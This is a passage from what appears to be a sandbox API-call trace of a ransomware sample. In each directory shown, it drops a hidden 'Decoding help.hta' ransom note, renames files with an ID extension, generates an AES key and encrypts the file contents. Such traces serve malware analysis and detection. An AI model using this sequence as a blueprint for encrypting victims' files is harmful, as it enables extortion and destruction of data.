ftLastWriteTime.dwLowDateTime=0x9fa0a390, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 1 [0049.642] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.643] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.643] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0049.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0049.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.643] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0) returned 0 [0049.643] CloseHandle (hObject=0xffffffff) returned 0 [0049.643] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.643] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSLoc.dll") returned -1 [0049.643] lstrlenW (lpString="MSTTSLoc.dll") returned 12 [0049.643] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.643] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.643] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSLoc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" [0049.643] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" [0049.643] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.820] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaf9b217, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xfaf9b217, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9fa0a390, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 0 [0049.820] FindClose (in: hFindFile=0x5d8490 | out: hFindFile=0x5d8490) returned 1 Thread: id = 601 os_tid = 0xda8 [0048.736] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*", lpFindFileData=0xa1cfd30 | out: lpFindFileData=0xa1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7f50 [0049.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.847] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xa1cfd30 | out: lpFindFileData=0xa1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.847] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.847] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.847] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xa1cfd30 | out: lpFindFileData=0xa1cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xeed1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1ENES.ITS", cAlternateFileName="")) returned 1 [0050.264] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*" [0050.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*") returned 68 [0050.264] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\Decoding help.hta" [0050.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\decoding help.hta")) returned 0xffffffff [0050.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0052.053] WriteFile (in: hFile=0x358, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa1cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa1cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.582] CloseHandle (hObject=0x358) returned 1 [0056.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.524] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1ENES.ITS") returned -1 [0058.524] lstrlenW (lpString="MSB1ENES.ITS") returned 12 [0058.524] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*" [0058.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*") returned 68 [0058.524] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\", lpString2="MSB1ENES.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" [0058.524] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" [0058.524] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.[ID]g9uZrLhJaygpwRm1[ID]" [0058.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.670] CreateFileMappingA (hFile=0x4bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7a0 [0060.670] CryptAcquireContextA (in: phProv=0xa1cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa1cfcec*=0x10e28b48) returned 1 [0060.671] CryptGenKey (in: hProv=0x10e28b48, Algid=0x6610, dwFlags=0x1, phKey=0xa1cfce8 | out: phKey=0xa1cfce8*=0x10a4b068) returned 1 [0060.671] CryptExportKey (in: hKey=0x10a4b068, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa1cfbe4, pdwDataLen=0xa1cfce4 | out: pbData=0xa1cfbe4*, pdwDataLen=0xa1cfce4*=0x2c) returned 1 [0060.671] MapViewOfFile (hFileMappingObject=0x7a0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeed00) returned 0xfb10000 [0064.972] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa1cfbe4*, pdwDataLen=0xa1cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa1cfbe4*, pdwDataLen=0xa1cfcf8*=0x100) returned 1 [0064.973] CryptEncrypt (hKey=0x10a4b068, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xfb10000, pdwDataLen=0xa1cfce4*=0xeed00, dwBufLen=0xeed00) Thread: id = 602 os_tid = 0xdac [0048.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*", lpFindFileData=0xa2cfd30 | out: lpFindFileData=0xa2cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d50 [0049.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.850] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0xa2cfd30 | out: lpFindFileData=0xa2cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.850] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.850] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.850] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0xa2cfd30 | out: lpFindFileData=0xa2cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xe64da, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1ENFR.ITS", cAlternateFileName="")) returned 1 [0050.228] lstrcpyW (in: lpString1=0x250f7848, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*" [0050.228] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*") returned 68 [0050.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\Decoding help.hta" [0050.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\decoding help.hta")) returned 0xffffffff [0050.228] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x958 [0057.417] WriteFile (in: hFile=0x958, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa2cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa2cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.418] CloseHandle (hObject=0x958) returned 1 [0057.418] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.418] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1ENFR.ITS") returned -1 [0057.418] lstrlenW (lpString="MSB1ENFR.ITS") returned 12 [0057.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*" [0057.418] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*") returned 68 [0057.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\", lpString2="MSB1ENFR.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" [0057.418] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" [0057.418] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" [0057.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb68 [0060.497] CreateFileMappingA (hFile=0xb68, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb5c [0060.497] CryptAcquireContextA (in: phProv=0xa2cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa2cfcec*=0x10e28680) returned 1 [0060.497] CryptGenKey (in: hProv=0x10e28680, Algid=0x6610, dwFlags=0x1, phKey=0xa2cfce8 | out: phKey=0xa2cfce8*=0x10bc5c10) returned 1 [0060.497] CryptExportKey (in: hKey=0x10bc5c10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa2cfbe4, pdwDataLen=0xa2cfce4 | out: pbData=0xa2cfbe4*, pdwDataLen=0xa2cfce4*=0x2c) returned 1 [0060.498] MapViewOfFile (hFileMappingObject=0xb5c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe64c0) Thread: id = 603 os_tid = 0xdb0 [0048.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*", lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x610018f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x610018f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e32b0 [0048.748] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.748] FindNextFileW (in: hFindFile=0x5e32b0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x610018f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x610018f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.748] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.748] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.748] FindNextFileW (in: hFindFile=0x5e32b0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a3eb700, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x61027a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a3eb700, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x257a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.Project.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0048.748] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*" [0048.748] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*") returned 86 [0048.748] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Decoding help.hta" [0048.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\decoding help.hta")) returned 0xffffffff [0048.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x678 [0051.114] WriteFile (in: hFile=0x678, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa3cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa3cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.547] CloseHandle (hObject=0x678) returned 1 [0053.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.628] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualStudio.Tools.Applications.Project.dll") returned -1 [0057.628] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Project.dll") returned 53 [0057.628] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.628] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*" [0057.628] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*.*") returned 86 [0057.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\", lpString2="Microsoft.VisualStudio.Tools.Applications.Project.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 